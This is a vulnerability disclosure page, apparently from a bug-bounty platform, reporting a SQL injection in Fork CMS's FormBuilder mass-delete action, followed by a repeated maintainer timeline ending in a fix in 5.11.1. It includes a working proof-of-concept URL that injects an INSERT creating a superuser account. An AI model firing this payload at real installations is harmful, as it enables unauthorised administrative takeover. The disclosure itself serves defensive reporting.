/

SQL Injection in forkcms/forkcms

Valid

Reported on

Oct 30th 2021

Description

When deleting submissions which belong to a formular (made with module FormBuilder), the parameter id[] is vulnerable for SQL injection.

Proof of Concept

Call the URL

http://127.0.0.1/private/en/form_builder/mass_data_action?form_id=2&token=aettnn67s&id[]=3);insert%20into%20users(email,password,is_god)%20values%20(%27attacker@example.com%27,%27$2y$10$qqJ9L1lIp38gKpqh1V3l1.EqLzj.brB0IqUPQ2XXcSjl6Dtcgq16C%27,1);--+&action=delete

To test this URL successfully, you need a valid formular and some submissions to that formular. You might have to adjust the parameter form_id to another value.
After calling this URL, you have a new entry in users table.

Impact

The attacker can tamper data in the database as they want.

We have contacted a member of the forkcms team and are waiting to hear back 2 years ago

We have sent a follow up to the forkcms team. We will try again in 7 days. 2 years ago

We have sent a second follow up to the forkcms team. We will try again in 10 days. 2 years ago

We have sent a third and final follow up to the forkcms team. This report is now considered stale. 2 years ago

Jelmer Prins has invalidated this vulnerability a year ago

csrf token fails and blocks this

The disclosure bounty has been dropped

The fix bounty has been dropped

commented a year ago

Maintainer

sorry, I was wrong, it is valid, I'll ask to reopen this one

commented a year ago

Admin

Re-opened! ♥️

Jelmer Prins validated this vulnerability a year ago

kstarkloff has been awarded the disclosure bounty

The fix bounty is now up for grabs

commented a year ago

Maintainer

fix is currently in review

Jelmer Prins marked this as fixed in 5.11.1 with commit 7a1204 a year ago

Jelmer Prins has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation

We have contacted a member of the forkcms team and are waiting to hear back 2 years ago

We have sent a follow up to the forkcms team. We will try again in 7 days. 2 years ago

We have sent a second follow up to the forkcms team. We will try again in 10 days. 2 years ago

We have sent a third and final follow up to the forkcms team. This report is now considered stale. 2 years ago

Jelmer Prins has invalidated this vulnerability a year ago

csrf token fails and blocks this

The disclosure bounty has been dropped

The fix bounty has been dropped

commented a year ago

Maintainer

sorry, I was wrong, it is valid, I'll ask to reopen this one

commented a year ago

Admin

Re-opened! ♥️

Jelmer Prins validated this vulnerability a year ago

kstarkloff has been awarded the disclosure bounty

The fix bounty is now up for grabs

commented a year ago

Maintainer

fix is currently in review

Jelmer Prins marked this as fixed in 5.11.1 with commit 7a1204 a year ago

Jelmer Prins has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation